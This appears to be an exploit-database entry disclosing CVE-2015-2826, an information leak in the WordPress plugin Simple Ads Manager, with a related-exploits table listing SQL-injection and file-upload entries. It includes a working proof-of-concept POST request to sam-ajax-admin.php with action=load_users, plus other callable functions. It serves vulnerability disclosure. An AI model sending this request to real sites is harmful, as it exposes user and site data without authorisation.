#Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2826 #Author: Nguyen Hung Tuan (tuan.h.nguyen@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 17 action=load_users + Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,... + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Image: http://www.itas.vn/uploads/newsother/disclosure.png + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
Related Exploits
Trying to match CVEs (1): CVE-2015-2826Trying to match OSVDBs (1): 120229
Other Possible E-DB Search Terms: WordPress Plugin Simple Ads Manager
Date | D | V | Title | Author |
---|---|---|---|---|
2015-04-02 |
![]() |
WordPress Plugin Simple Ads Manager - Multiple SQL Injections | ITAS Team | |
2015-04-02 |
![]() |
WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload | ITAS Team | |
2015-12-30 |
![]() |
WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection | Kacper Szurek |